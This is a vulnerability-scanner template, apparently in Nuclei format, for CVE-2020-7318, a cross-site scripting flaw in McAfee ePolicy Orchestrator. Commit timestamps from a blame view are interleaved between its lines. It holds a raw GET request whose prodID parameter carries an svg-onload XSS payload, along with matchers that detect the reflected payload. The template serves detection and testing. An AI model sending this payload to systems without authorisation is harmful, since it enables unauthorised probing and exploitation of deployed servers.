2021-01-02 04:56:15 +00:00
id : CVE-2020-7318
2020-12-09 08:54:40 +00:00
info :
2022-08-16 14:14:41 +00:00
name : McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
2020-12-09 08:54:40 +00:00
author : dwisiswant0
severity : medium
description : |
2022-08-16 14:14:41 +00:00
McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.
2021-08-18 11:29:20 +00:00
reference :
2020-12-09 08:54:40 +00:00
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
2022-05-17 09:18:12 +00:00
- https://kc.mcafee.com/corporate/index?page=content&id=SB10332
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-7318
2022-08-19 20:55:50 +00:00
reference :
- https://kc.mcafee.com/corporate/index?page=content&id=SB10332
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-7318
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*
epss-score : 0.00051
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,xss,mcafee
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2020-12-09 08:54:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-01-10 22:39:54 +00:00
- raw :
2020-12-09 08:54:40 +00:00
- |
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
2021-01-10 22:39:54 +00:00
Host : {{Hostname}}
2020-12-09 08:54:40 +00:00
Connection : close
2021-01-10 22:39:54 +00:00
2020-12-09 08:54:40 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "text/html"
part : header
- type : word
words :
- "Policy Name"
- "'\"><svg/onload=alert(document.domain)>"
condition : and
2022-01-04 19:34:16 +00:00
part : body
2022-08-16 14:14:41 +00:00
# Enhanced by mp on 2022/08/15